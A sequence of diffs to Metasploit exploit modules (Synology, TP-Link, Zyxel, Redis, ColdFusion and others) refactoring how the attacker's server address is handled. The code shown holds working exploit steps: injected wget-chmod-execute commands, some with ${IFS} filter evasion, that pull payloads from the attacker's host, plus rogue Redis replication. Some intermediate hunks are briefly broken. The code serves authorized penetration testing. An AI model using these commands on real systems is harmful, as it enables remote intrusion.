-    if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
-    end
-
-    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
+    url = 'http://' + Rex::Socket.to_authority(srvhost, srvport)
 
     @shell_name = Rex::Text.rand_text_alpha(15)
     stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -164,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_stager(cli, _request)
-    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
+    url = 'http://' + srvhost + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
 
     stager = "<cfhttp method='get' url='#{url}'"
     stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"

--- a/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
+++ b/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit
   end
 
   def exploit
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
     srvport = datastore['SRVPORT']
     filename = datastore['FILENAME']
     resource_uri = '/' + filename

--- a/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
+++ b/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
@@ -113,13 +113,11 @@ class MetasploitModule < Msf::Exploit
   end
 
   def exploit
-    srvhost = srvhost
-    srvport = datastore['SRVPORT']
     filename = datastore['FILENAME']
     resource_uri = '/' + filename
     shell_path = '/tmp/'
     cmds = [
-      "\`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",
+      "\`wget${IFS}http://" + srvhost_addr + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "\`",
       "\`chmod${IFS}700${IFS}" + shell_path + filename + "\`",
       "\`" + shell_path + filename + "\`"
     ]

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -67,7 +67,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5000),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
         OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
         OptString.new('PASSWORD', [true, 'The Password for Synology', ''])

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5000),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
         OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
         OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
@@ -178,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Cleaning env')
     inject_request(cookie, token, 'rm -rf /a')
     inject_request(cookie, token, 'rm -rf b')
-    command = "#{srvhost}:#{datastore['SRVPORT']}".split(//)
+    command = "#{srvhost_addr}:#{srvport}".split(//)
     command_space = 22 - "echo -n ''>>/a".length
     command_space -= 1
     command.each_slice(command_space) do |a|

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -67,6 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5000),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('TARGETURI', [true, 'The URI of the Synology Website', '/']),
         OptString.new('USERNAME', [true, 'The Username for Synology', 'admin']),
         OptString.new('PASSWORD', [true, 'The Password for Synology', ''])
@@ -162,10 +163,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
-    end
-
     begin
       print_status('Attempting Login')
       cookie, token = login

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -163,38 +163,36 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      print_status('Attempting Login')
-      cookie, token = login
+    print_status('Attempting Login')
+    cookie, token = login
 
-      start_service({
-        'Uri' => {
-          'Proc' => proc do |cli, req|
-            on_request_uri(cli, req, cookie, token)
-          end,
-          'Path' => '/'
-        }
-      })
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req, cookie, token)
+        end,
+        'Path' => '/'
+      }
+    })
 
-      print_status('Cleaning env')
-      inject_request(cookie, token, 'rm -rf /a')
-      inject_request(cookie, token, 'rm -rf b')
-      command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
-      command_space = 22 - "echo -n ''>>/a".length
-      command_space -= 1
-      command.each_slice(command_space) do |a|
-        a = a.join('')
-        vprint_status("Staging wget with: echo -n '#{a}'>>/a")
-        inject_request(cookie, token, "echo -n '#{a}'>>/a")
-      end
-      print_status('Requesting payload pull')
-      register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
-      register_file_for_cleanup('/a')
-      inject_request(cookie, token, 'wget -i /a -O b')
-      # at this point we let the HTTP server call the last stage
-      # wfsdelay should be long enough to hold out for everything to download and run
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    print_status('Cleaning env')
+    inject_request(cookie, token, 'rm -rf /a')
+    inject_request(cookie, token, 'rm -rf b')
+    command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+    command_space = 22 - "echo -n ''>>/a".length
+    command_space -= 1
+    command.each_slice(command_space) do |a|
+      a = a.join('')
+      vprint_status("Staging wget with: echo -n '#{a}'>>/a")
+      inject_request(cookie, token, "echo -n '#{a}'>>/a")
     end
+    print_status('Requesting payload pull')
+    register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
+    register_file_for_cleanup('/a')
+    inject_request(cookie, token, 'wget -i /a -O b')
+    # at this point we let the HTTP server call the last stage
+    # wfsdelay should be long enough to hold out for everything to download and run
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
   end
 end

--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
@@ -178,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Cleaning env')
     inject_request(cookie, token, 'rm -rf /a')
     inject_request(cookie, token, 'rm -rf b')
-    command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
+    command = "#{srvhost}:#{datastore['SRVPORT']}".split(//)
     command_space = 22 - "echo -n ''>>/a".length
     command_space -= 1
     command.each_slice(command_space) do |a|

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -247,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # This is an important check...
-    fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
+    fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if srvhost =~ /(127|0)\.0\.0\.(0|1)|localhost/
 
     # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
@@ -283,7 +283,7 @@ class MetasploitModule < Msf::Exploit::Remote
     thrift_client.call('getNodeType', Rex::Proto::Thrift::ThriftData.stop)
 
     # Step 3 download the malicious pak
-    server_url = "http://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{file_name}.tar"
+    server_url = "http://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{file_name}.tar"
     print_status 'Sending RemotePakDownloadCommand...'
     thrift_client.call(
       'runCommand',

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -246,9 +246,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # This is an important check...
-    fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if srvhost =~ /(127|0)\.0\.0\.(0|1)|localhost/
-
     # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
     pak_name = "#{file_name}.pak"
@@ -283,7 +280,7 @@ class MetasploitModule < Msf::Exploit::Remote
     thrift_client.call('getNodeType', Rex::Proto::Thrift::ThriftData.stop)
 
     # Step 3 download the malicious pak
-    server_url = "http://#{Rex::Socket.to_authority(srvhost, datastore['SRVPORT'])}/#{file_name}.tar"
+    server_url = "http://#{Rex::Socket.to_authority(srvhost_addr, datastore['SRVPORT'])}/#{file_name}.tar"
     print_status 'Sending RemotePakDownloadCommand...'
     thrift_client.call(
       'runCommand',

--- a/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
+++ b/modules/exploits/linux/misc/cve_2020_13160_anydesk.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def discover
     server_sock = Rex::Socket::Udp.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => datastore['SRVPORT'],
       'Context' => {
         'Msf' => framework,

--- a/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
+++ b/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uuid = SecureRandom.uuid
 
     ldap_port = datastore["SRVPORT"]
-    ldap_host = datastore["SRVHOST"]
+    ldap_host = srvhost
     ldap_external_host = datastore["LDAPHOST"]
 
     command = payload.encoded

--- a/modules/exploits/linux/misc/opennms_java_serialize.rb
+++ b/modules/exploits/linux/misc/opennms_java_serialize.rb
@@ -84,10 +84,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def wget_payload
     resource_uri = '/' + @dropped_elf
 
-    if datastore['SRVHOST'] == "0.0.0.0" || datastore['SRVHOST'] == "::"
+    if srvhost == "0.0.0.0" || srvhost == "::"
       srv_host = Rex::Socket.source_address(rhost)
     else
-      srv_host = datastore['SRVHOST']
+      srv_host = srvhost
     end
 
     service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/misc/opennms_java_serialize.rb
+++ b/modules/exploits/linux/misc/opennms_java_serialize.rb
@@ -84,15 +84,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def wget_payload
     resource_uri = '/' + @dropped_elf
 
-    if srvhost == "0.0.0.0" || srvhost == "::"
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
-
-    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-
-    vprint_status("#{peer} - Starting up our web service on #{service_url} ...")
+    service_url = 'http://' + srvhost_addr + ':' + srvport.to_s + resource_uri
+    vprint_status("#{peer} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service(
       'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }
     )

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -72,7 +72,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         Opt::RPORT(20002)
       ]
     )

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         Opt::RPORT(20002)
       ]
     )
@@ -359,18 +359,18 @@ class MetasploitModule < Msf::Exploit::Remote
     # generate our payload executable
     @payload_exe = generate_payload_exe
 
-    http_service = "http://#{Rex::Socket.to_authority(srvhost, srvport)}"
+    resource_uri = "/#{payload_file}"
 
     # Command that will download @payload_exe and execute it
-    download_cmd = "wget #{http_service}/#{payload_file};chmod +x #{payload_file};./#{payload_file}"
+    download_cmd = "wget http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri};chmod +x #{payload_file};.#{resource_uri}"
 
-    print_status("Starting up our web service on #{http_service}...")
+    print_status("Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|
           on_request_uri(cli, req)
         end,
-        'Path' => "/#{payload_file}"
+        'Path' =>
       }
     })
 

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -72,6 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         Opt::RPORT(20002)
       ]
     )
@@ -336,12 +337,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if (datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::')
-      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
-    end
-
     if datastore['SSL']
-      fail_with(Failure::Unknown, 'SSL is not supported on this target, please disable it')
+      fail_with(Failure::Unknown, 'SSL is not supported on this target, please disable it.')
     end
 
     print_status("Attempting to exploit #{target.name}")
@@ -356,19 +353,18 @@ class MetasploitModule < Msf::Exploit::Remote
       [rand(0xff), rand(0xff), rand(0xff), rand(0xff)].pack('C*') + # serial number, can by any value
       [0x5A, 0x6B, 0x7C, 0x8D].pack('C*') # Checksum placeholder
 
-    srv_host = datastore['SRVHOST']
-    srv_port = datastore['SRVPORT']
     @cmd_file = rand_text_alpha_lower(1)
     payload_file = rand_text_alpha_lower(1)
 
     # generate our payload executable
     @payload_exe = generate_payload_exe
 
-    # Command that will download @payload_exe and execute it
-    download_cmd = "wget http://#{srv_host}:#{srv_port}/#{payload_file};chmod +x #{payload_file};./#{payload_file}"
+    http_service = "http://#{Rex::Socket.to_authority(srvhost, srvport)}"
 
-    http_service = "http://#{srv_host}:#{srv_port}"
-    print_status("Starting up our web service on #{http_service} ...")
+    # Command that will download @payload_exe and execute it
+    download_cmd = "wget #{http_service}/#{payload_file};chmod +x #{payload_file};./#{payload_file}"
+
+    print_status("Starting up our web service on #{http_service}...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -369,7 +369,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Proc' => proc do |cli, req|
           on_request_uri(cli, req)
         end,
-        'Path' =>
+        'Path' => resource_uri
       }
     })
 

--- a/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
+++ b/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
@@ -144,9 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
       # https:// can't be a substring as the zyxel parser won't be able to understand the URI
       download_cmd += '-k${IFS}https:`echo${IFS}//`'
     end
-    http_service = "#{Rex::Socket.to_authority(srvhost, srvport)}"
+    http_service = Rex::Socket.to_authority(srvhost, srvport).to_s
     download_cmd += "#{http_service}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"
-
 
     print_status("Starting up our web service on #{http_service}...")
     start_service({

--- a/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
+++ b/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address])
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections'])
       ]
     )
 
@@ -144,10 +144,10 @@ class MetasploitModule < Msf::Exploit::Remote
       # https:// can't be a substring as the zyxel parser won't be able to understand the URI
       download_cmd += '-k${IFS}https:`echo${IFS}//`'
     end
-    http_service = Rex::Socket.to_authority(srvhost, srvport).to_s
+    http_service = Rex::Socket.to_authority(srvhost_addr, srvport).to_s
     download_cmd += "#{http_service}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"
 
-    print_status("Starting up our web service on #{http_service}...")
+    print_status("Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
+++ b/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
@@ -58,7 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        Opt::RPORT(80)
+        Opt::RPORT(80),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address])
       ]
     )
 
@@ -129,14 +130,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
-      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
-    end
-
     print_status("Attempting to exploit #{target.name}")
 
-    srv_host = datastore['SRVHOST']
-    srv_port = datastore['SRVPORT']
     @cmd_file = rand_text_alpha_lower(1)
     payload_file = rand_text_alpha_lower(1)
 
@@ -149,10 +144,11 @@ class MetasploitModule < Msf::Exploit::Remote
       # https:// can't be a substring as the zyxel parser won't be able to understand the URI
       download_cmd += '-k${IFS}https:`echo${IFS}//`'
     end
-    download_cmd += "#{srv_host}:#{srv_port}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"
+    http_service = "#{Rex::Socket.to_authority(srvhost, srvport)}"
+    download_cmd += "#{http_service}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};"
 
-    http_service = "#{srv_host}:#{srv_port}"
-    print_status("Starting up our web service on #{http_service} ...")
+
+    print_status("Starting up our web service on #{http_service}...")
     start_service({
       'Uri' => {
         'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
+++ b/modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
@@ -58,8 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        Opt::RPORT(80),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections'])
+        Opt::RPORT(80)
       ]
     )
 

--- a/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
+++ b/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(6379),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
       ]
     )
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #
     # Send the payload.
     #
-    redis_command('SLAVEOF', srvhost, srvport.to_s)
+    redis_command('SLAVEOF', srvhost_addr, srvport.to_s)
     redis_command('CONFIG', 'SET', 'dbfilename', module_file.to_s)
     ::IO.select(nil, nil, nil, 2.0)
 
@@ -159,14 +159,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # We pretend to be a real redis server, and then slave the victim.
   #
   def start_rogue_server
-    begin
-      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => srvhost, 'LocalPort' => srvport })
-      print_status("Listening on #{srvhost}:#{srvport}")
-    rescue Rex::BindFailed
-      print_warning("Handler failed to bind to #{srvhost}:#{srvport}")
-      print_status("Listening on 0.0.0.0:#{srvport}")
-      socket = Rex::Socket::TcpServer.create({ 'LocalHost' => '0.0.0.0', 'LocalPort' => srvport })
-    end
+    socket = Rex::Socket::TcpServer.create({ 'LocalHost' => bindhost, 'LocalPort' => bindport })
+    print_status("Listening on #{Rex::Socket.to_authority(bindhost, bindport)}")
 
     rsock = socket.accept
     vprint_status('Accepted a connection')

--- a/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
+++ b/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
@@ -57,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(6379),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
       ]
     )
@@ -109,10 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       @module_init_name = 'shell'
       @module_cmd = 'shell.exec'
-    end
-
-    if srvhost == '0.0.0.0'
-      fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
     end
 
     #

--- a/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
+++ b/modules/exploits/linux/redis/redis_replication_cmd_exec.rb
@@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(6379),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
       ]
     )

--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -119,10 +119,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # we use SRVHOST as download IP for the coming wget command.
       # SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      if (srvhost == "0.0.0.0" or srvhost == "::")
         srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
       else
-        srv_host = datastore['SRVHOST']
+        srv_host = srvhost
       end
 
       service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri

--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -111,23 +111,14 @@ class MetasploitModule < Msf::Exploit::Remote
     if (datastore['DOWNHOST'])
       service_url_payload = datastore['DOWNHOST'] + resource_uri
     else
-
       # Needs to be on the port 80
       if datastore['SRVPORT'].to_i != 80
         fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
       end
 
-      # we use SRVHOST as download IP for the coming wget command.
-      # SRVHOST needs a real IP address of our download host
-      if (srvhost == "0.0.0.0" or srvhost == "::")
-        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
-      else
-        srv_host = srvhost
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      service_url_payload = srv_host + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url_payload = srvhost_addr + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => Proc.new { |cli, req|

--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -119,7 +119,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8500),
-        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
         OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
         OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])

--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -119,6 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8500),
+        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
         OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
         OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
         OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])
@@ -201,11 +202,6 @@ class MetasploitModule < Msf::Exploit::Remote
     cf_url = Rex::Text.rand_text_alpha_lower(4)
 
     srvhost = datastore['SRVHOST']
-
-    # Ensure SRVHOST is a routable IP address to our RHOST.
-    if Rex::Socket.addr_atoi(srvhost) == 0
-      srvhost = Rex::Socket.source_address(rhost)
-    end
 
     # Create a URL pointing back to our HTTP server.
     cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"

--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cf_url = Rex::Text.rand_text_alpha_lower(4)
 
-    srvhost = datastore['SRVHOST']
+    srvhost = srvhost
 
     # Create a URL pointing back to our HTTP server.
     cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"

--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26360.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(8500),
-        OptAddressRoutable.new('SRVHOST', [true, 'The local host to listen on and use for incoming connections.', Rex::Socket.source_address]),
+        OptAddressRoutable.new('SRVHOST', [false, 'The local host to listen on and use for incoming connections']),
         OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']),
         OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']),
         OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log'])
@@ -201,10 +201,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cf_url = Rex::Text.rand_text_alpha_lower(4)
 
-    srvhost = srvhost
-
     # Create a URL pointing back to our HTTP server.
-    cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>"
+    cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}')/>"
 
     cf_reflectarray = Rex::Text.rand_text_alpha_lower(4)
 

--- a/modules/exploits/multi/http/bassmaster_js_injection.rb
+++ b/modules/exploits/multi/http/bassmaster_js_injection.rb
@@ -142,15 +142,9 @@ class MetasploitModule < Msf::Exploit::Remote
     @elf_sent = false
     downfile = rand_text_alpha(8 + rand(8))
     resource_uri = "\\x2f#{downfile}"
-    if (srvhost == "0.0.0.0" or srvhost == "::")
-      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
-    else
-      srv_host = srvhost
-    end
 
-    @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
-    service_url_payload = srv_host + resource_uri
-    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
